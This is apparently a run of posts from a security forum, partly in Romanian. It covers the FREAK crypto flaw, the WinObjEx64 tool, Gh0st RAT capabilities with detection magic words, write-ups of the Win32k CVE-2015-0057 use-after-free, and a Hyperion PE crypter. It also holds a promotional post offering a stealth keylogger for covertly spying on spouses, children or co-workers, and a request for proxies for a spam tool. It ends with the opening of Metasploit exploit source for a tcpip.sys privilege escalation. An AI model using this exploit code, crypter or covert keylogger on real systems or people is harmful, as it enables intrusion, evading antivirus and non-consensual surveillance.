intelligence agencies would be able to monitor. This was done badly. So badly, that while the policies were ultimately scrapped, they’re still hurting us today,” cryptographer Matthew Green of Johns Hopkins University wrote in a blog post explaining the vulnerability and its consequences. “The 512-bit export grade encryption was a compromise between dumb and dumber. In theory it was designed to ensure that the NSA would have the ability to ‘access’ communications, while allegedly providing crypto that was still ‘good enough’ for commercial use. Or if you prefer modern terms, think of it as the original ‘golden master key.'” Given today’s modern computing power, an attacker could crack the weaker keys in a matter of hours using processing power available from providers such as Amazon, for example. “What this means is that you can obtain that RSA key once, factor it, and break every session you can get your ‘man in the middle’ mitts on until the server goes down. And that’s the ballgame,” Green said. Source
  17. Windows Object Explorer 64-bit (WinObjEx64) WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights. System Requirements WinObjEx64 does not require administrative privileges. However administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP, Windows Vista is partially supported. We have no plans of their full support. In order to use all program features Windows must be booted in the DEBUG mode. Build WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. Authors © 2015 WinObjEx64 Project Original WinObjEx © 2003 - 2005 Four-F Acknowledgements We would like to thanks the following people for their contributions (in the alphabetical order): Andrew Ivlev aka Four-F - author of the original x86-32 WinObjEx Giuseppe Bonfa aka Evilcry - KDSubmarine author Mark Russinovich - author of the original proof-of-concept tool WinObj Microsoft WinDBG developers team Source and compiled binary here https://github.com/hfiref0x/WinObjEx64 Project files SHA1: https://github.com/hfiref0x/WinObjEx64/blob/master/Source/SHA1.hash Copy: 818bf9f0d4189347e9bd157a2810615109423e62 *Release\WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *Release\WinObjEx64.exe 6f4df146c341d7f2dafbe5e3d1aee5f2c7b3488b *WinObjAdv\aboutDlg.c d0e500c0092000d73fd711a5d20c35b69f4ac447 *WinObjAdv\aboutDlg.h 74fcc74b3d7d7a4467869a888dcd4f67797ca156 *WinObjAdv\excepth.c 2ba8ded754090338b733797accdb696162866e75 *WinObjAdv\excepth.h fbad8de8cbc2eb1ed7612a495ac5e0206210d241 *WinObjAdv\findDlg.c 68449112b665b763729ef78fec2d7e2dd2bca653 *WinObjAdv\findDlg.h 08f9599cc724cda5a8148a09dc31655e1eefe345 *WinObjAdv\global.h 80c6e0253371e8debbf7389ffe954231ad5bf705 *WinObjAdv\instdrv.c 2a943159f01da7516f1a49c5bd1407a69835bbce *WinObjAdv\instdrv.h 0f68ede96ad12ad93f594525b98b3daf25e2383a *WinObjAdv\kldbg.c 1892a89b673214b71d08854f39ee55342ae72c88 *WinObjAdv\kldbg.h 37814686c9a82fdfdc568f2759cea117fc2a9952 *WinObjAdv\list.c f26030f75546ec594fd5a87ee2fc82796480599d *WinObjAdv\list.h 9f98dd38d9b13f7572f59589973d3033d7d34fcb *WinObjAdv\main.c e9cf1468a3ebcb67fcea1b86730a25e6669b096b *WinObjAdv\minirtl.c 500a94a62e9ba78c38833670302537cf6fb0e3d0 *WinObjAdv\minirtl.h ef02d79e830000af6efbd0cb527eaa7a60efa917 *WinObjAdv\ntos.h 4c1698b624baaa52f6b2ff2c536b9df644e52820 *WinObjAdv\obex.manifest 92c7dfb2face6bc570fb63ee123702ebf30764f4 *WinObjAdv\propBasic.c ff406cb1a50504533e367eca67e759f044ddd5ab *WinObjAdv\propBasic.h a00e7fa470faad601bde2219e596c20c2294acd0 *WinObjAdv\propBasicConsts.h 4328cb76fcb70930fe8be27e7c89ad768273224f *WinObjAdv\propDesktop.c cf5e6d7616c776aff3bcf6ec7698fb18bfd76950 *WinObjAdv\propDesktop.h 9364e13a1eb1c2c8062ce1002fcbf7d5dfba344c *WinObjAdv\propDlg.c bdc4258b60a8c512c487cfd6c726caa0ff3b0976 *WinObjAdv\propDlg.h 72cb46536bd855f9ee2b6be32bd097ec48267909 *WinObjAdv\propDriver.c d4bf75d244002db8da4cd5314ea757896bbcbd3e *WinObjAdv\propDriver.h b72b9ee8ccfbbd78844548e40d6bebf42d497a67 *WinObjAdv\propDriverConsts.h a82596fc8914f384049c68469eb45c0468866c44 *WinObjAdv\propObjectDump.c df95b45770b80b5e88fd5cfea593eb51790222a2 *WinObjAdv\propObjectDump.h f4de0f1071031d2ae108a683ca9deb5066a9f3a3 *WinObjAdv\propObjectDumpConsts.h 1e3d3e0747dd2bf464f9351018309e78fe02870e *WinObjAdv\propProcess.c 4a050a42f7bf083fafe23f0fe94bf34d45287559 *WinObjAdv\propProcess.h 0325abb4e9bf8867eea50fdb7f508b010d702d70 *WinObjAdv\propSecurity.c ac8356ce68b06cbd917bd54ed463d3ea15f06856 *WinObjAdv\propSecurity.h aefd3c0d9ea1a5506cafa3425fbb6128aab132d4 *WinObjAdv\propSecurityConsts.h 7513279bf1104150e0a1608176b899f2b5073fa3 *WinObjAdv\propType.c b01ee5835191e2e2e47106630f5f42fcab789b92 *WinObjAdv\propType.h 565a332243f0beb23970bf4e0180c9607bd7a246 *WinObjAdv\propTypeConsts.h 21028096ddc34328c1c098ca3de2de59aa6e9075 *WinObjAdv\resource.h 4d063a98918873efcc86682d31c18aeb821e2367 *WinObjAdv\Resource.rc f2c93d88f1a5dbfa8cafa1c31e02c866dc975371 *WinObjAdv\rsrc\100.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\101.ico fd979dd62fdbeba6298ac1dabbc678fe0dbb0ae5 *WinObjAdv\rsrc\102.ico c16779a0fef28aab679eda6c18e7c6f5e68a5c20 *WinObjAdv\rsrc\103.ico bcd4d1222ebdcf1545209451c5247cb61549ec23 *WinObjAdv\rsrc\104.ico a0b22a0e9ab1401926aef939df99acc1a7a7d9ad *WinObjAdv\rsrc\105.ico e94d7aad576eccad0d8d8c52249700230dab76c8 *WinObjAdv\rsrc\106.ico 824001cd7bae24b7217b075d32da7618c93bdd00 *WinObjAdv\rsrc\107.ico c5c1a26d3e2bab8086d663ce2326f476e73f0f08 *WinObjAdv\rsrc\108.ico 65f8d9d565b00930920fbff580c87d399b90f9cc *WinObjAdv\rsrc\109.ico 56c27e823eb044da4d7726f0d35d98822bd79344 *WinObjAdv\rsrc\110.ico 08b8573a1efd1803099698a011f3c3d6eb00d3da *WinObjAdv\rsrc\111.ico f9ea074c8c152d30af74f4b266ab80aaf10a2821 *WinObjAdv\rsrc\112.ico 13e524fbc7b803ab711e11fb61f1014641cff8b6 *WinObjAdv\rsrc\113.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\114.ico 3a9b58b48fd4dfcb356abfd915036d7195c3c29c *WinObjAdv\rsrc\115.ico 335fd760d495b9a68ccafbcfb52f4f1ddc90b3fc *WinObjAdv\rsrc\116.ico 2d9b7e5622ef1c6f96cf85d344a989df7d129530 *WinObjAdv\rsrc\117.ico aa221c069f9a53f9afa7fbccb4465ce4da6baf58 *WinObjAdv\rsrc\118.ico 530ac9c2d277d9908decb955618ab2b43995cd1f *WinObjAdv\rsrc\119.ico 4ef03bb6bbc10b1723770a03b6fd899d3be1044a *WinObjAdv\rsrc\120.ico d84cd22bab028700050a644be5c2a7dafcc4553a *WinObjAdv\rsrc\121.ico 557be784a62110a81aa0f4b620c210e165857905 *WinObjAdv\rsrc\122.ico 674f4875596c907ee8da940edff1e98401e8b7fa *WinObjAdv\rsrc\123.ico 041a38d1522858aaede0df6d42b2479c8300c988 *WinObjAdv\rsrc\124.ico c0832fe5bf96f11a8133bbed66449574a3fd9089 *WinObjAdv\rsrc\125.ico 0a2aeedde4dc3934e28d727396c1ff93fddf6a6e *WinObjAdv\rsrc\126.ico 56d12ceb51825d502ba3a096396404af56b8f817 *WinObjAdv\rsrc\127.ico b7c0bf31dd02382e151e4d62fc078bc292303ff9 *WinObjAdv\rsrc\128.ico 267f398bd643e7c1591412b2c7538b79e1159ca9 *WinObjAdv\rsrc\129.ico 1be3fd5b055f60b2c2357e9cb87dddad22542a95 *WinObjAdv\rsrc\130.ico 8b725d0d5552061a6cd88e17eda3d580c4fa7fde *WinObjAdv\rsrc\131.ico 9e89e0564daacd2bb36f906e4754d3a3b95141d7 *WinObjAdv\rsrc\132.ico f57a70dbb02c43ffcf8b6d028f775606a2be5d91 *WinObjAdv\rsrc\133.ico 863ce1668eccc967273a8fbaff5e29db81d4d047 *WinObjAdv\rsrc\134.ico d9bb1b62d374b1cfb0892d5e1437342701db2a1f *WinObjAdv\rsrc\135.ico 8c64531a70ad2bf61c050fd1e69a9d7e87549c35 *WinObjAdv\rsrc\136.ico 34356dcf20c4dd0adc3d363d25dcd7ed4e98bfa9 *WinObjAdv\rsrc\137.ico 656ccfe0b2a147b61b16321e14516e0c2dccbd57 *WinObjAdv\rsrc\138.ico 1721fe712b75808604318f015c09f6b2b469baf7 *WinObjAdv\rsrc\6001.ico 68b25362609b6db97c40b375e2497e2db4f5ee48 *WinObjAdv\rsrc\6002.ico 8f4a9ec169d9c6e80ae2a8ee1947dab63665337d *WinObjAdv\rsrc\Bitmap_125.bmp 6f5b29fffb021bf80ca91d6d67cfc019d63f7175 *WinObjAdv\rsrc\kldbgdrv.sys da3fa9f3a72da9bde1d73dd4b5f7d93b909fe3d6 *WinObjAdv\sup.c 38c463dcf6a834eea357bc766135dfa5210ba99c *WinObjAdv\sup.h 09ca1ed7f052113f24bf2f11c877538b772701a3 *WinObjAdv\supConsts.h e87a6e82d41f9b065e58fdc5a2acf362ca6969cb *WinObjAdv\treelist.c 7d5d97dcc923a87d5f6064fe1b9fdba5e04674fe *WinObjAdv\treelist.h a99d9f26e6df31641a6780993b96b76d0e0ce088 *WinObjAdv\ui.h e78a55a5c4a562c54d77b16f24b88c42fd6b3816 *WinObjAdv\WinObjAdv.vcxproj e9ba01dd003e20ab20191dabbebde20921abe3f6 *FILELIST.txt 5eedad7ce5b95dd191d1556072481e18295676fd *README.md 0d66462034a77394dc5272acdb8d13758f448b19 *TODO.txt 16ee9f3cf034a76595910177b911832de6a4081c *WinObjAdv.sln In attach compiled version. SHA1 818bf9f0d4189347e9bd157a2810615109423e62 *WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *WinObjEx64.exe Copyrights WinObjEx64 developed by WinObjEx64 Project group, in the alphabetical order: EP_X0FF MP_ART This program uses Windows Debugger Local Kernel Debugging Driver © Microsoft Corporation. Please use this thread for bugreports. Also take a note that Windows 10 is supported *AS IS* since it wasn't released yet, official support will be added after official release. Download Source
  18. Recomanda cineva un site de unde pot lua un VPS cu Windows pentru GSA si tools like that? De-asemenea caut si niste proxie-uri private, bune. Multumesc.
  19. In this article series, we will learn about one of the most predominant malware, named Gh0st RAT, whose source code is dated back to 2001 but it is still relevant today. In this article series, we will learn what exactly is Gh0st RAT, all its variants, how it works, its characteristics, etc. What is Gh0st RAT? Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth. Gh0st RAT capabilities I think that before I delve into more technical details of Gh0st RAT, let us take a brief look at the capabilities or reach of Gh0st RAT. Below is a list of Gh0st RAT capabilities. Gh0st RAT can: Take full control of the remote screen on the infected bot. Provide real time as well as offline keystroke logging. Provide live feed of webcam, microphone of infected host. Download remote binaries on the infected remote host. Take control of remote shutdown and reboot of host. Disable infected computer remote pointer and keyboard input. Enter into shell of remote infected host with full control. Provide a list of all the active processes. Clear all existing SSDT of all existing hooks. Gh0st RAT Components This section will throw light on both at user and kernel level binaries of the Gh0st RAT toolset. Gh0st RAT has two main components: client and server. Controller Application: This is known as client, which is typically a Windows application that is used to track and manage Gh0st servers on remote compromised hosts. The two main functions this module serves is the management and control of Gh0st servers and the ability to create customized server install programs. Windows DLL (user level binary): The DLL is named SVCHOST.DLL. It is the Windows DLL that gets installed on a compromised host as a Windows service. This service is the server component of the Gh0st toolkit. It checks in to the Gh0st client on startup and awaits instructions. The setup and installation of this DLL as a service is done by the install program (Dropper) SERVER.EXE which we will discuss in a short while. INSTALL.EXE Dropper application is used to install SVCHOST.DLL. This is a stand-alone Windows application that contains all required code to prepare a compromised host for the installation of the Gh0st RAT server service and the launching of that service. Kernel Level Binary: This is present in the toolset with the .SYS filename RESSDT.SYS. This is a very small device driver that performs a single task: resetting the Windows System Service Dispatch Table (SSDT). This is the only kernel level binary in the toolset. It runs at system startup on the compromised host and removes all hooks in the SSDT. Install Program: This is commonly called “the dropper.” It contains the two above described binaries and performs all of the work necessary to install the Gh0st server on a host and startup the Gh0st service. Gh0st RAT Variants Since Gh0st Rat source code is available for everyone, Gh0st Rat has many versions available, as people have generally used and even modified the code to fit their purpose. Gh0st, because of its number of variants and encrypted capabilities, is hard to recognize. Most antivirus detections today are automatically generated, resulting in names thought out by machines. Quick, but containing information only machines find interesting. The most stable indicator of being faced with a Gh0stRat is its network communication. It is well documented and quite distinctive, as it always begins with a “magic word” which in its default configuration is “Gh0st” – thus Gh0st Rat. As one can imagine, the detection of the “Gh0st” keyword in the network stream is pretty easy, as tools like Network Intrusion Prevention System (NIPS) or even Wireshark magic words are easily available in the fixed length of 5 bytes. So the below key words are from the investigations guide that contains all the magic words from a Gh0st Network stream: “7hero, Adobe, B1X6Z, BEiLa, BeiJi, ByShe, FKJP3, FLYNN, FWAPR, FWKJG,GWRAT, Gh0st, GOLDt, HEART, HTTPS, HXWAN, Heart, IM007, ITore, KOBBX, KrisR, LUCKK, LURK0, LYRAT, Level, Lover, Lyyyy, MYFYB, MoZhe, MyRat, OXXMM, PCRat, QWPOT, Spidern, Tyjhu, URATU, W0LFKO, Wangz, Winds, World, X6RAT, XDAPR, Xjjhj, ag0ft, attac, cb1st, https, whmhl, xhjyk, 00000, ABCDE, apach, Assas, Blues, chevr, CHINA, cyl22, DrAgOn EXXMM,Eyes1, Gi0st, GM110, Hello, httpx, kaGni, light, LkxCq, lvxYT, Naver, NIGHT, NoNul, Origi, QQ_124971919, Snown, SocKt, Super, Sw@rd, v2010, VGTLS, wcker, Wh0vt, wings, X6M9K, xqwf7, YANGZ” The above is not an exhaustive list, and even magic keywords like “Spidern” and “W0LFKO” come with non-standard length of 5 bytes. Other irregular magic keywords like “DrAgOn” and “QQ_124971919? do not even compress their network traffic like most other Gh0st do. In the next article of this series, we will learn about Gh0st network connections, why it is difficult to control this type of attack, and what are the possible solutions for its control that can be put in place. References http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf http://www.mcafee.com/in/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf Source
  20. Do you want to know what your buddy or co-workers are doing online? Or perhaps you want to check up on your children or spouse and know what they are doing on the computer? With Perfect Keylogger it is possible in just 2 minutes! This program runs on the installed computer, fully hidden from its users, and logs everything that is typed in a protected file. Install Perfect Keylogger and find out the Truth! Perfect Keylogger is a new generation keylogger which is virtually undetectable. It was created as an alternative to very expensive commercial products like Spector Keylogger or E-Blaster. It has a similar functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and use it immediately without messing with settings. Perfect Keylogger is a popular award-winning tool, translated into 20+ languages. It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list. Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later. Our keylogger has unique remote installation feature. You can create a pre-configured package for instant and stealth installation on the target computer. New Smart Rename feature lets you to rename all keylogger's executable files and registry entries using one keyword! One of the most powerful features of Perfect Keylogger is its advanced Keyword Detection and Notification. Create a list of "on alert" words or phrases and keylogger will continually monitor keyboard typing, URLs and web pages for these words or phrases. You tell Perfect Keylogger which phrases to watch out for - for example, "sex," "porno", "where do you live," "are your parents home," "is your wife sleeping," "I hate my boss" - whatever you decide to include. When a keyword is detected, Perfect Keylogger makes screenshot and immediately sends email notification to you. Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in Windows 7/Vista/XP Task Manager! Now we are glad to offer the full Windows 64 bit support - you won't find it in most of competition products. The program lets you easily view the log file, displaying the title of the window (for example, title: "John (Online) - Message Session" in Yahoo IM), the date and time of the action and the contents of the typed matter itself. Unlike some other spy software products, Perfect Keylogger does not send any information to our company. Only you will receive the log files. We guarantee absolute privacy, high quality product and technical support - that's why we have thousands of satisfied customers. You pay once, all updates are free. For example, customers, who bought the first version in 2002, now can get the advanced latest version for free! You can be sure that you will always have the most modern spy software! We have to tell you, that such a software is very complex and only 2-3 products on the market, including this, have a good quality to use them effectively. Do not use a cheap or a free monitoring software! You can get an important data leaks or the system crashes! We can guarantee your system safety with our product. Perfect Keylogger is available in three editions: full version, full version remote edition and basic edition. Choose the functionality you need. Supported platforms for Perfect Keylogger: Windows 2000, Windows XP (32-bit and x64), Windows Server 2003/2008, Windows Vista (32-bit and x64), Windows 7, Windows 8 / 8.1 (32-bit and x64); Older versions of Windows are supported with older builds of the product. Minimum requirements for Perfect Keylogger: Windows XP or later (older versions are also available) Home Page - Perfect Keylogger for Windows 8/7/XP - Remote Monitoring Software. Download invisible keylogger now. Free trial Sursa: BlazingTools Perfect Keylogger Remote Edition 1.93 PS: Nu este verificat fiindca nu este pus de mine, eu doar am gasit programul pe acest site. Am mai folosit acest site si vad ca nu sunt virusi, dar nu strica sa verificati. Apropo, care este mai bun: asta sau Ardamax ?
  21. Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". Changes: Added Windows 8/8.1 support. Download: here Link website: nullsecurity
  22. The vulnerabilities addressed in this month’s Patch Tuesday security bulletins from Microsoft have been a mashup of critical bugs affecting most supported versions of Windows and Internet Explorer that could pave the way for attackers to gain complete control of affected systems. Sounds like most months, for sure. But what sets this month apart is the regular stream of disclosures from researchers in the hours and days following patches from Microsoft. The latest surrounds MS15-010, a bulletin that patches six critical remote code execution, security bypass and privilege escalation bugs in the Windows kernel-mode driver. That bulletin includes a security feature bypass in CNG.sys, or the Cryptography Next Generation kernel-mode driver, disclosed by Google’s Project Zero research team. The vulnerability was out in the open for close to two weeks after Project Zero’s 90-day disclosure window expired. Details on a privilege escalation vulnerability, CVE-2015-0057, in the Windows kernel GUI component, the Win32k.sys module, yesterday were shared by researchers at enSilo. According to CTO Udi Gavo, all versions of Windows are affected, including the Windows 10 Technical Preview, and attackers could exploit the bug and gain control over the compromised computer. “A threat actor that gains access to a Windows machine (say, through a phishing campaign) can exploit this vulnerability to bypass all Windows security measures, defeating mitigation measures such as sandboxing, kernel segregation and memory randomization,” he said in a published report. The vulnerability can be exploited by modifying one bit in Windows, the report said. The exploit works, enSilo said, despite the presence of numerous kernel-level protections instituted by Microsoft, in particular in Windows 8.1. Kernel DEP, ASLR, SMEP and others are mitigations that prevent code execution within certain kernel regions, but some researchers have already developed bypasses. EnSilo provides technical details on the vulnerability in its report, in particular an examination of the xxxEnableWndSBArrows function which enables and disables scrollbars in Windows. “Through a single call, this function can alter the state of both scrollbars,” the report said. “It is precisely within this function wherein the vulnerability lies.” On Tuesday, consultancy JAS Global Advisors released details on critical vulnerabilities in Group Policy that expose Windows users to man-in-the-middle attacks, remote code execution attacks, and security bypasses. The Jasbug, as it was nicknamed, was reported in January 2014 but since it was a design issue rather than one related to an implementation, it required some re-engineering by Microsoft. “The vulnerability is remotely exploitable and may grant the attacker administrator level privileges on the target machine/device,” JAS said. “Roaming machines – domain-joined Windows devices that connect to corporate networks via the public Internet (e.g. from hotels and coffee shops) – are at heightened risk.” JAS said that computers connecting over a virtual private network should be immune to compromise. Further mitigating the risk, JAS said, is that a number of scenarios have to be in place for exploits to work. “It certainly doesn’t work universally and it depends on some funky misconfigurations and happenstance. But it works frequently enough to be of concern,” JAS said in its advisory. Microsoft also addressed reports with a silent feature update in Visual Studio (KB3001652) that was causing Windows machines to lock up. The update has since been re-released after it was removed from Windows Update. Sursa
  23. Introduction Today, Microsoft released their latest Patch Tuesday. This Patch includes a fix for vulnerability CVE-2015-0057, an IMPORTANT-rated exploitable vulnerability which we responsibly disclosed to Microsoft a few months ago. As part of our research, we revealed this privilege escalation vulnerability which, if exploited, enables a threat actor to complete control of a Windows machine. In other words, a threat actor that gains access to a Windows machine (say, through a phishing campaign) can exploit this vulnerability to bypass all Windows security measures, defeating mitigation measures such as sandboxing, kernel segregation and memory randomization. Interestingly, the exploit requires modifying only a single bit of the Windows operating system. We have verified this exploit against all supported Windows desktop versions, including Windows 10 Technical Preview. This entry starts by detailing the vulnerability. At first, it seemed to us impossible to exploit. After some hard word, however, we managed to produce a fully working exploit which we’ll describe. As part of this analysis, we also present a video which demonstrates the exploit. Finally, we conclude this entry with a buggy dead-code anecdote which we thought interesting to share. Responsible disclosure: although this blog entry is technical, we won’t reveal any code, or the complete details, to prevent any tech master from being able to reproduce an exploit. Background Over the last several years, privilege escalation vulnerabilities became all the more crucial for exploitation because they enable malicious code to run on the kernel. As such, a threat actor exploiting a privileged escalation vulnerability can bypass protective security mechanisms such as application sandboxes. Step by step with the attackers’ progress, Microsoft made extensive efforts to protect the kernel. The reasoning is that even if a vulnerability exists, exploiting it would be difficult, if not impossible. For example, here are just a few of the kernel protection mechanisms that are present in Windows 8.1:Kernel DEP – Ensures that most kernel data regions cannot be executed • Kernel DEP – Ensures that most kernel data regions cannot be executed • KASLR – Randomizes the kernel address-space to avoid figuring out where kernel modules exist • Integrity Level – Limits the ability of an unprivileged application to leak kernel-related information • Mitigation Of Common Attack Vectors – Hardens commonly abused structures (such as the Win32k wnd proc field) • SMEP – Prevents execution control transfers between kernel mode to user-mode • NULL Dereference Protection – Prohibits mapping of the first 64k of data in user-mode Albeit these hardening mechanisms, in the past year we have seen some notable presentations that demonstrated techniques to bypass these protections. The vulnerability which we describe in this entry, is a newly disclosed privilege escalation exploitable vulnerability that too bypasses these protections. The Vulnerability: a hole in the Win32k.sys module This particular vulnerability appears in the GUI component of Microsoft Windows Kernel, namely, the Win32k.sys module. This entry assumes a strong technical understanding of the Win32k.sys module. For detailed information on this module, please refer to Tajei Mandt, Gilad Bakas and Gil Dabah. Zooming into Window Scrollbars The Win32k module manages also the actual windows’ scrollbars. These scrollbars – whether horizontal or vertical – are set for each window. Let’s zoom into these scrollbars: As can be seen in Figure 1, each SBDATA structure defines the information regarding one of the scrollbars. The WSBflags is a bitmask that determines the state of the scrollbars. In order to enable and disable a window scrollbar, the function xxxEnableWndSBArrows is used. Through a single call, this function can alter the state of both scrollbars. It is precisely within this function wherein the vulnerability lies. Deep Diving into xxxEnableWndSBArrows The prototype of xxxEnableWndSBArrows is: • Wnd – A pointer to the relevant window • wSBflags – The scrollbar type (e.g. horizontal or vertical) • wArrows – Specifies whether the scrollbar’s arrows are enabled or disabled and indicates which arrows are enabled or disabled. In order to describe the vulnerability, we’ll take a look at the first part of the xxxEnableWndSBArrows function which can be broken down into 3 logical parts: Part 1 – Allocation of a new scrollbar (if needed) The function starts by checking whether there is already scrollbar information for that window and allocates a new scrollbar information struct, if needed. Technically speaking, the function reads the pSBInfo field (to recall, this field points to the tagSBINFO struct) and tests if the pointer is NULL. If the field is null and the wArrows parameter is not NULL, then a tagSBINFO struct is allocated for the window and the old flags of the scrollbars are set to 0. Otherwise the old flags are copied from the existing window’s scrollbars information. The code can be found in Figure 2. Part 2 – Setting the state of the horizontal scrollbar The flow continues by testing whether the state of horizontal scrollbar should be changed. According to what was set in the wArrows argument, the function enables or disables the arrows (figure 3). Part 3 – Testing the state of the scrollbar arrows The flow continues by checking whether the state of the arrows have changed. Technically speaking, this is done by checking the arrow’s flags (to note, there are a few more flag checks – but those are not interesting for our purpose). If the flags have changed and the window is visible then xxxDrawScrollbar is called. This is precisely the place where things get interesting. When digging into the code, it seems possible that the xxxDrawScrollBar will lead to a user–mode callback (Figure 4). The pivotal function in this call chain is the ClientLoadLibrary. This function performs the callback to the user-mode function __ClientLoadLibrary. Let’s return now to the code of xxxEnableWndSBArrows. Our examination showed that the tagSBINFO pointer is used without any verification after the callback. Ultimately, this could lead to a Use-After-Free (UAF) vulnerability since the function may continue to work with the freed scrollbar information (Figure 5). The Exploitation: manipulating windows properties After the callback, the function xxxEnableWndSBArrows continues and changes the state of the vertical scrollbar. At this stage, the function tries to enable or disable the flags. However, since the struct is already freed, we can use this to either Bitwise OR the first DWORD of the freed buffer with 0xC (if we disable the arrows) or to clear bit 3 and 4 (if we enable the arrows). See figure 6 For simplicity sake, we show how to manipulate 2 bits in order to “rule them all”. However, manipulating only one of them would be enough. The bit manipulation at first didn’t seem enough to result in anything significant, but we decided to keep trying. The most obvious things to try were to either increase the size of some buffer (using the bitwise OR) or decrease some reference counter (using the bitwise AND). After a short search we found an object that met the first requirement. This object is the properties list of a window. The Window Properties List Each window has a properties list. Generally, these properties can be used by the GUI application to store arbitrary values, though also Win32K uses this properties list in order to store internal data. The data structures used to hold the window’s properties can be seen in Figure 7. The first field, cEntries, is the number of entries in the properties array; iFirstFree is the index to the first free cell in the properties array; and props is the array itself. An application can set the window’s properties using the SetProp API. The prototype of the function is as follows: • hWnd – The handle to the window. • lpString – The of the property or an ATOM. • hData – The data to store. Adding properties to a window is performed through the CreateProp function, appearing in the win32k module. As can be seen in figure 8 its allocation algorithm is quite simple. If there is no room for a new property in the list, the function allocates a new properties list with one more entry. The function then proceeds to copy the buffer of the old properties to the new one, frees the old buffer and increases the entries count. There are several important things to note in this code: First, the properties are allocated from the Desktop heap (Uses DesktopAlloc). Also, tagSBINFO is allocated from this heap. This is crucial if we want to use the UAF vulnerability to alter the properties structure. Second, each new entry triggers the reallocation of the buffer. This means that we can easily trigger the reallocation of the buffer when it’s about to reach the size of the tagSBINFO structure. Doing this increases the chances that the buffer will be allocated over the freed tagSBINFO struct. Third, and most importantly, the cEntries field is located in the first DWORD of the struct. This means that we can increase its size (using the bitwise Or). After increasing the size of the properties array we basically achieved a classical buffer-overflow. Proof-of-Concept Video The above research led to the privilege escalation exploitation. We stop here, however, to avoid releasing any sensitive code. Our demo on a 64-bit Windows 10 Technical Preview provides the necessary proof-of-concept: Summary After some work we managed to create a reliable exploit for all versions of Windows – dating back as of Windows XP to Windows 10 preview (With SMEP and protections turned on). We have shown that even a minor bug can be used to gain complete control over any Windows Operating System. Nevertheless, we think that Microsoft efforts to make the its operating system more secure raised the bar significantly and made writing reliable exploits far harder than before. Unfortunately, these measures are not going to keep attackers at bay. We predict that attackers will continue incorporating exploits into their crime kits, making compromise inevitable. Last side note: funny code Examining the code of the xxxEnableWndSBArrows function showed that there are calls to the xxxWindowEvent function. At first glance it seemed that these two functions would be far easier to use as an exploitation stepping stone than the xxxDrawScrollbar function, as detailed above. However, after diving into the code it quickly became clear that the calls to xxxWindowEvent in the Horizontal scrollbar part of the code are actually dead-code (Figure 9). Looking at the code, there are two conditional calls to the function, xxxWindowEvent. These calls are executed only if the old flags of the scrollbar information differ from those of the new flags. However, by the time these conditions appear, the values of the old flags and the new flags are always equal. Hence, the condition for calling xxxWindowEvent is never met. This practically means that this dead-code was there for about 15-years doing absolutely nothing. Source
  24. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'Windows tcpip.sys Arbitrary Write Privilege Escalation', 'Description' => %q{ A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys, can allow an attacker to inject controlled memory into an arbitrary location within the kernel. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ ['Windows Server 2003 SP2', { '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ] ], 'References' => [ ['CVE', '2014-4076'], ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt'] ], 'DisclosureDate'=> 'Nov 11 2014', 'DefaultTarget' => 0 })) end def check if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return Exploit::CheckCode::Safe unless handle session.railgun.kernel32.CloseHandle(handle) file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys" unless file?(file_path) return Exploit::CheckCode::Unknown end major, minor, build, revision, branch = file_version(file_path) vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device('\\\\.\\tcp', 